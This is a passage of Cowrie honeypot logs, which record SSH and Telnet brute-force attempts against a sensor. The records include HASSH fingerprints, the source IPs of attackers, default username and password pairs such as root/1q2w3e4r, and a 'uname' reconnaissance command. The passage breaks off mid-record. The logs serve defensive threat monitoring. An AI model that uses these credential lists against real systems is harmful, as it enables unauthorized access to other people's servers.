{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:12:54.633303Z","src_ip":"102.88.137.80","session":"ea0d70fe55b4"}
{"eventid":"cowrie.session.connect","src_ip":"102.88.137.80","src_port":1215,"dst_ip":"1.2.3.4","dst_port":22,"session":"d473bd6116e6","protocol":"ssh","message":"New connection: 102.88.137.80:1215 (1.2.3.4:22) [session: d473bd6116e6]","sensor":"my-vps","timestamp":"2025-08-31T01:12:54.754619Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T01:12:54.755515Z","src_ip":"102.88.137.80","session":"d473bd6116e6"}
{"eventid":"cowrie.client.kex","hassh":"713bd9cc935561939c02dad25af2d3de","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes256-ctr,aes256-cbc,aes128-gcm@openssh.com,aes128-ctr,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes256-ctr","aes256-cbc","aes128-gcm@openssh.com","aes128-ctr","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 713bd9cc935561939c02dad25af2d3de","sensor":"my-vps","timestamp":"2025-08-31T01:12:54.877970Z","src_ip":"102.88.137.80","session":"d473bd6116e6"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-31T01:12:55.411122Z","src_ip":"102.88.137.80","session":"d473bd6116e6"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-31T01:12:55.513641Z","src_ip":"212.227.235.229","session":"0f1095b8b045"}
{"eventid":"cowrie.login.failed","username":"dev","password":"12345678","message":"login attempt [dev/12345678] failed","sensor":"my-vps","timestamp":"2025-08-31T01:12:55.883946Z","src_ip":"212.227.125.160","session":"4866b8f1a21a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":50088,"dst_ip":"1.2.3.4","dst_port":22,"session":"2ab533e937c6","protocol":"ssh","message":"New connection: 212.227.235.229:50088 (1.2.3.4:22) [session: 2ab533e937c6]","sensor":"my-vps","timestamp":"2025-08-31T01:12:56.532835Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T01:12:56.533921Z","src_ip":"212.227.235.229","session":"2ab533e937c6"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:12:56.536434Z","src_ip":"102.88.137.80","session":"d473bd6116e6"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T01:12:56.601390Z","src_ip":"212.227.235.229","session":"2ab533e937c6"}
{"eventid":"cowrie.session.connect","src_ip":"102.88.137.80","src_port":1216,"dst_ip":"1.2.3.4","dst_port":22,"session":"843983c91859","protocol":"ssh","message":"New connection: 102.88.137.80:1216 (1.2.3.4:22) [session: 843983c91859]","sensor":"my-vps","timestamp":"2025-08-31T01:12:56.657795Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T01:12:56.658970Z","src_ip":"102.88.137.80","session":"843983c91859"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:12:56.751939Z","src_ip":"212.227.235.229","session":"0f1095b8b045"}
{"eventid":"cowrie.client.kex","hassh":"713bd9cc935561939c02dad25af2d3de","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes256-ctr,aes256-cbc,aes128-gcm@openssh.com,aes128-ctr,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes256-ctr","aes256-cbc","aes128-gcm@openssh.com","aes128-ctr","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 713bd9cc935561939c02dad25af2d3de","sensor":"my-vps","timestamp":"2025-08-31T01:12:56.781631Z","src_ip":"102.88.137.80","session":"843983c91859"}
{"eventid":"cowrie.login.failed","username":"audrey","password":"123456","message":"login attempt [audrey/123456] failed","sensor":"my-vps","timestamp":"2025-08-31T01:12:56.906692Z","src_ip":"212.227.235.229","session":"2ab533e937c6"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":51436,"dst_ip":"1.2.3.4","dst_port":22,"session":"7eae38529572","protocol":"ssh","message":"New connection: 212.227.235.229:51436 (1.2.3.4:22) [session: 7eae38529572]","sensor":"my-vps","timestamp":"2025-08-31T01:12:56.986237Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T01:12:56.992821Z","src_ip":"212.227.235.229","session":"7eae38529572"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T01:12:57.227936Z","src_ip":"212.227.235.229","session":"7eae38529572"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-31T01:12:57.312694Z","src_ip":"102.88.137.80","session":"843983c91859"}
{"eventid":"cowrie.session.closed","duration":"4.2","message":"Connection lost after 4.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:12:57.437444Z","src_ip":"102.88.137.80","session":"ea0d70fe55b4"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:12:57.438382Z","src_ip":"102.88.137.80","session":"843983c91859"}
{"eventid":"cowrie.session.closed","duration":"4.6","message":"Connection lost after 4.6 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:12:57.612897Z","src_ip":"212.227.125.160","session":"4866b8f1a21a"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:12:57.974752Z","src_ip":"212.227.235.229","session":"2ab533e937c6"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-31T01:12:58.170141Z","src_ip":"212.227.235.229","session":"7eae38529572"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:12:58.414131Z","src_ip":"212.227.235.229","session":"7eae38529572"}
{"eventid":"cowrie.session.closed","duration":"7.6","message":"Connection lost after 7.6 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:12:58.415116Z","src_ip":"212.227.235.229","session":"1d3752a78639"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":37966,"dst_ip":"1.2.3.4","dst_port":22,"session":"63931b28078a","protocol":"ssh","message":"New connection: 212.227.125.160:37966 (1.2.3.4:22) [session: 63931b28078a]","sensor":"my-vps","timestamp":"2025-08-31T01:12:58.952422Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T01:12:58.953437Z","src_ip":"212.227.125.160","session":"63931b28078a"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T01:12:59.027656Z","src_ip":"212.227.125.160","session":"63931b28078a"}
{"eventid":"cowrie.login.failed","username":"rabbitmq","password":"rabbitmq","message":"login attempt [rabbitmq/rabbitmq] failed","sensor":"my-vps","timestamp":"2025-08-31T01:12:59.322560Z","src_ip":"212.227.125.160","session":"63931b28078a"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:13:00.472977Z","src_ip":"212.227.125.160","session":"63931b28078a"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T01:13:07.109364Z","src_ip":"212.227.125.160","session":"6b32641d94bf"}
{"eventid":"cowrie.session.closed","duration":"42.6","message":"Connection lost after 42.6 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:13:07.327071Z","src_ip":"212.227.125.160","session":"6b32641d94bf"}
{"eventid":"cowrie.session.closed","duration":16.29934573173523,"message":"Connection lost after 16 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:13:07.647008Z","src_ip":"212.227.235.229","session":"bc7204bb7793"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":33318,"dst_ip":"1.2.3.4","dst_port":22,"session":"047f34f754c4","protocol":"ssh","message":"New connection: 212.227.125.160:33318 (1.2.3.4:22) [session: 047f34f754c4]","sensor":"my-vps","timestamp":"2025-08-31T01:13:09.455287Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T01:13:09.455981Z","src_ip":"212.227.125.160","session":"047f34f754c4"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T01:13:09.530956Z","src_ip":"212.227.125.160","session":"047f34f754c4"}
{"eventid":"cowrie.login.success","username":"root","password":"aa123456","message":"login attempt [root/aa123456] succeeded","sensor":"my-vps","timestamp":"2025-08-31T01:13:09.803145Z","src_ip":"212.227.125.160","session":"047f34f754c4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T01:13:10.102851Z","src_ip":"212.227.125.160","session":"047f34f754c4"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-31T01:13:10.103543Z","src_ip":"212.227.125.160","session":"047f34f754c4"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:13:10.178011Z","src_ip":"212.227.125.160","session":"047f34f754c4"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:13:10.179115Z","src_ip":"212.227.125.160","session":"047f34f754c4"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":51384,"dst_ip":"1.2.3.4","dst_port":23,"session":"a3a6a246fc7a","protocol":"telnet","message":"New connection: 212.227.235.229:51384 (1.2.3.4:23) [session: a3a6a246fc7a]","sensor":"my-vps","timestamp":"2025-08-31T01:13:10.874331Z"}
{"eventid":"cowrie.session.closed","duration":3.0763726234436035,"message":"Connection lost after 3 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:13:13.950614Z","src_ip":"212.227.235.229","session":"a3a6a246fc7a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":42612,"dst_ip":"1.2.3.4","dst_port":23,"session":"28ab2bd9f931","protocol":"telnet","message":"New connection: 212.227.235.229:42612 (1.2.3.4:23) [session: 28ab2bd9f931]","sensor":"my-vps","timestamp":"2025-08-31T01:13:17.812670Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":37998,"dst_ip":"1.2.3.4","dst_port":22,"session":"6d1c155308cd","protocol":"ssh","message":"New connection: 212.227.125.160:37998 (1.2.3.4:22) [session: 6d1c155308cd]","sensor":"my-vps","timestamp":"2025-08-31T01:13:19.953738Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T01:13:19.954746Z","src_ip":"212.227.125.160","session":"6d1c155308cd"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T01:13:20.027987Z","src_ip":"212.227.125.160","session":"6d1c155308cd"}
{"eventid":"cowrie.login.success","username":"root","password":"1q2w3e4r","message":"login attempt [root/1q2w3e4r] succeeded","sensor":"my-vps","timestamp":"2025-08-31T01:13:20.251402Z","src_ip":"212.227.125.160","session":"6d1c155308cd"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T01:13:21.010786Z","src_ip":"212.227.125.160","session":"6d1c155308cd"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-31T01:13:21.011523Z","src_ip":"212.227.125.160","session":"6d1c155308cd"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:13:21.145223Z","src_ip":"212.227.125.160","session":"6d1c155308cd"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:13:21.146379Z","src_ip":"212.227.125.160","session":"6d1c155308cd"}
{"eventid":"cowrie.session.closed","duration":10.795839786529541,"message":"Connection lost after 10 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:13:28.608439Z","src_ip":"212.227.235.229","session":"28ab2bd9f931"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":49802,"dst_ip":"1.2.3.4","dst_port":22,"session":"903189b91498","protocol":"ssh","message":"New connection: 212.227.125.160:49802 (1.2.3.4:22) [session: 903189b91498]","sensor":"my-vps","timestamp":"2025-08-31T01:13:30.412304Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T01:13:30.413412Z","src_ip":"212.227.125.160","session":"903189b91498"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecds